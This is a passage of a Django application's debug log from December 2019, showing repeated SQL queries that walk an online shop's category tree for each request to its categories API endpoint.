"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:38:16,443 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:38:16] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:38:18,482 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:38:18,488 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:38:18,492 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:38:18,494 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:38:18,497 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:38:18,499 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:38:18,501 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:38:18,503 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:18,506 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:38:18,509 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:38:18,511 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:18,514 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:38:18,516 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:38:18,518 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:38:18,521 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:38:18,523 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:38:18,526 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:38:18,528 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:38:18,530 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:18,533 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:38:18,536 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:38:18,538 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:38:18,540 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:38:18,542 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:38:18,544 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:38:18,547 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:38:18,550 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:38:18,552 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:38:18,554 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:38:18,556 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:38:18,559 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:38:18,562 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:38:18,564 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:38:18,566 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:38:18,568 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:38:18,572 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:38:18,574 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:38:18,576 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:38:18,578 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:38:18,581 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:38:18,583 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:38:18,585 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:38:18,588 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:38:18,590 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:38:18,592 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:38:18,595 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:38:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:38:20,488 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:38:20,499 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:38:20,505 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:38:20,510 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:38:20,516 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:38:20,520 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:38:20,524 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:38:20,528 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:38:20,532 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:38:20,538 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:38:20,542 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:38:20,546 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:38:20,550 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:38:20,554 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:38:20,560 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:38:20,564 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:38:20,568 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:38:20,572 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:38:20,576 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:38:20,582 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:38:20,586 utils 4252 140031492613888 (0.001) SELECT 